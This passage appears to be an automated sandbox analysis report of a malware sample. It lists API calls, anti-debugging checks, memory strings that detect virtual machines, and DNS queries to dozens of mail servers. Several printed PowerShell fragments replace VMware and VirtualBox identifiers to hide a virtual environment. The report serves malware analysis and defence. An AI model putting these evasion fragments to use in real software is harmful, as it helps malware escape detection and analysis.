                      Source: C:\Windows\System32\svchost.exe Code function: 13_2_000001F28C93E09C FindFirstFileExW, 13_2_000001F28C93E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 14_2_000001CA9854E09C FindFirstFileExW, 14_2_000001CA9854E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001D26531E09C FindFirstFileExW, 15_2_000001D26531E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 16_2_00000254A2D4E09C FindFirstFileExW, 16_2_00000254A2D4E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000024B87DDE09C FindFirstFileExW, 17_2_0000024B87DDE09C
                      Source: C:\Windows\System32\svchost.exe Code function: 18_2_00000205FD40E09C FindFirstFileExW, 18_2_00000205FD40E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 19_2_000001A2056AE09C FindFirstFileExW, 19_2_000001A2056AE09C
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
                      Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe Thread delayed: delay time: 922337203685477
                      Source: svchost.exe, 00000012.00000003.2447348502.00000205FBA12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk2.06000c292b65879ff477a6af604113f58PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                      Source: svchost.exe, 00000012.00000002.3586489469.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.2389115187.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
                      Source: svchost.exe, 00000012.00000000.2389148210.00000205FAC43000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@vmci
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
                      Source: svchost.exe, 00000010.00000002.3574867559.00000254A202B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWarVMware SATA CD00
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                      Source: dwm.exe, 0000000B.00000000.2336959469.0000011607ED0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000=
                      Source: svchost.exe, 00000025.00000002.3574175847.000001C781F02000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000012.00000003.2468013769.00000205FBEAD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                      Source: svchost.exe, 00000012.00000000.2390667937.00000205FBA00000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                      Source: svchost.exe, 00000012.00000000.2389029535.00000205FABD0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                      Source: svchost.exe, 00000025.00000002.3567852683.000001C781E40000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                      Source: svchost.exe, 00000012.00000000.2393227900.00000205FD300000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMCI: Using capabilities (0x1c).
                      Source: svchost.exe, 00000012.00000000.2389029535.00000205FABD0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                      Source: svchost.exe, 00000025.00000002.3566731323.000001C781E2B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
                      Source: svchost.exe, 00000012.00000003.2447156347.00000205FBA03000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f588
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
                      Source: svchost.exe, 00000012.00000000.2390667937.00000205FBA00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                      Source: svchost.exe, 00000012.00000000.2390371069.00000205FB933000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
                      Source: $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: svchost.exe, 00000025.00000000.2478863296.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c292b65879ff477a6af604113f58
                      Source: svchost.exe, 00000012.00000000.2389029535.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                      Source: svchost.exe, 00000025.00000002.3566731323.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
                      Source: svchost.exe, 00000025.00000002.3566731323.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000012.00000000.2389029535.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                      Source: svchost.exe, 00000025.00000002.3566731323.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000012.00000003.2468013769.00000205FBEAD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c292b65879ff477a6af604113f58PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                      Source: lsass.exe, 00000009.00000002.3571560766.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                      Source: svchost.exe, 00000025.00000002.3566731323.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000025.00000000.2478906977.000001C781E40000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                      Source: svchost.exe, 00000012.00000003.2447156347.00000205FBA03000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                      Source: dwm.exe, 0000000B.00000000.2336959469.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PointVMware&P
                      Source: svchost.exe, 00000012.00000003.2447348502.00000205FBA12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: storahciNECVMWarVMware SATA CD00
                      Source: svchost.exe, 00000025.00000002.3569732643.000001C781E5B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c292b65879ff477a6af604113f58
                      Source: $778e373e, 00000006.00000002.3563173232.000000000132E000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2328491778.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3566398984.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3570342911.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.2331426687.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000000.2365614210.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3568404917.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3557807339.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.2366393327.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.2370145365.00000254A2043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.3575863874.00000254A2043000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: lsass.exe, 00000009.00000002.3571560766.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                      Source: svchost.exe, 00000025.00000002.3569732643.000001C781E5B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: UDFBBSCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                      Source: svchost.exe, 00000025.00000002.3566731323.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000012.00000000.2390460443.00000205FB943000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                      Source: svchost.exe, 00000012.00000000.2389029535.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                      Source: svchost.exe, 0000000A.00000000.2331577136.00000195DD66A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: svchost.exe, 00000025.00000002.3566731323.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 0000001C.00000002.3560663509.000001B278E02000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                      Source: lsass.exe, 00000009.00000002.3571560766.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                      Source: svchost.exe, 00000025.00000000.2478863296.000001C781E2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000012.00000000.2389029535.00000205FABD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eAPI call chain: ExitProcess graph end nodegraph_6-8465
                      Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_7-8523
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FD689A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00FD689A
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FD309C mov eax, dword ptr fs:[00000030h]6_2_00FD309C
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FD96E1 mov ecx, dword ptr fs:[00000030h]6_2_00FD96E1
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FDAA90 mov eax, dword ptr fs:[00000030h]6_2_00FDAA90
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4Code function: 3_2_004019E1 StrCatW,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,StrStrIW,StrCatW,StrStrIW,StrNCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrNCatW,StrCatW,StrCatW,StrCatW,StrStrIW,StrCatW,StrCpyW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,RtlFreeHeap,3_2_004019E1
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FD689A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00FD689A
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FDAAEA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00FDAAEA
                      Source: C:\Users\user\AppData\Local\Temp\$778e373eCode function: 6_2_00FD6B84 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00FD6B84
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000001B094E98170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000001B094E98170
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000001B094E984D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_000001B094E984D8
                      Source: C:\Windows\System32\dllhost.exeCode function: 7_2_000001B094E9D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000001B094E9D65C
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E858988170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001E858988170
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E85898D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000001E85898D65C
                      Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E8589884D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_000001E8589884D8
                      Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE8684D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00000140AE8684D8
                      Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE868170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000140AE868170
                      Source: C:\Windows\System32\lsass.exeCode function: 9_2_00000140AE86D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000140AE86D65C
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000195DD5C84D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00000195DD5C84D8
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000195DD5CD65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00000195DD5CD65C
                      Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000195DD5C8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00000195DD5C8170
                      Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000257E10A84D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00000257E10A84D8
                      Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000257E10A8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000257E10A8170
                      Source: C:\Windows\System32\svchost.exeCode function: 12_2_00000257E10AD65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000257E10AD65C
                      Source: C:\Windows\System32\svchost.exeCode function: 13_2_000001F28C938170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000001F28C938170
                      Source: C:\Windows\System32\svchost.exeCode function: 13_2_000001F28C9384D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_000001F28C9384D8
                      Source: C:\Windows\System32\svchost.exeCode function: 13_2_000001F28C93D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000001F28C93D65C
                      Source: C:\Windows\System32\svchost.exeCode function: 14_2_000001CA98548170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000001CA98548170
                      Source: C:\Windows\System32\svchost.exeCode function: 14_2_000001CA985484D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_000001CA985484D8
                      Source: C:\Windows\System32\svchost.exeCode function: 14_2_000001CA9854D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000001CA9854D65C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001D2653184D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001D2653184D8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001D265318170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001D265318170
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001D26531D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001D26531D65C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000254A2D4D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00000254A2D4D65C
                      Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000254A2D48170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00000254A2D48170
                      Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000254A2D484D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00000254A2D484D8
                      Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000024B87DD84D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0000024B87DD84D8
                      Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000024B87DDD65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000024B87DDD65C
                      Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000024B87DD8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000024B87DD8170
                      Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000205FD408170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000205FD408170
                      Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000205FD40D65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000205FD40D65C
                      Source: C:\Windows\System32\svchost.exeCode function: 18_2_00000205FD4084D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00000205FD4084D8
                      Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001A2056A8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001A2056A8170
                      Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001A2056AD65C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001A2056AD65C
                      Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001A2056A84D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_000001A2056A84D8
                      Source: C:\Users\user\Desktop\vm6XYZzWOd.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\System32\svchost.exeDomain query: mail.hereiam.plus.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.secureserver.net
                      Source: C:\Windows\System32\svchost.exeDomain query: alt4.aspmx.l.google.com
                      Source: C:\Windows\System32\svchost.exeDomain query: alc.io
                      Source: C:\Windows\System32\svchost.exeDomain query: cometa21.it
                      Source: C:\Windows\System32\svchost.exeDomain query: eddwebs.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.cogeco.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.iprimus.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.strath.ac.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.virginmedia.com
                      Source: C:\Windows\System32\svchost.exeDomain query: peterboroughcab-org-uk.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.acicapital.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.grandwayne.com
                      Source: C:\Windows\System32\svchost.exeDomain query: teletu.it
                      Source: C:\Windows\System32\svchost.exeDomain query: tinyworld.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.centrum.sk
                      Source: C:\Windows\System32\svchost.exeDomain query: out.caistergolf.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.skynet.be
                      Source: C:\Windows\System32\svchost.exeDomain query: nrl.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.kabsi.at
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.optimum.net
                      Source: C:\Windows\System32\svchost.exeDomain query: out.aumentarpenis.net
                      Source: C:\Windows\System32\svchost.exeDomain query: cilm.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.sohns-ruit.de
                      Source: C:\Windows\System32\svchost.exeDomain query: emf.eei.uni-erlangen.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.websitebod.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.agrotipp.hu
                      Source: C:\Windows\System32\svchost.exeDomain query: mstevens.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.rockfiend.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.sccoast.net
                      Source: C:\Windows\System32\svchost.exeDomain query: tiscali.cz
                      Source: C:\Windows\System32\svchost.exeDomain query: tluh.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.ranuccy.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.helanta.sh
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.clubinternet.fr
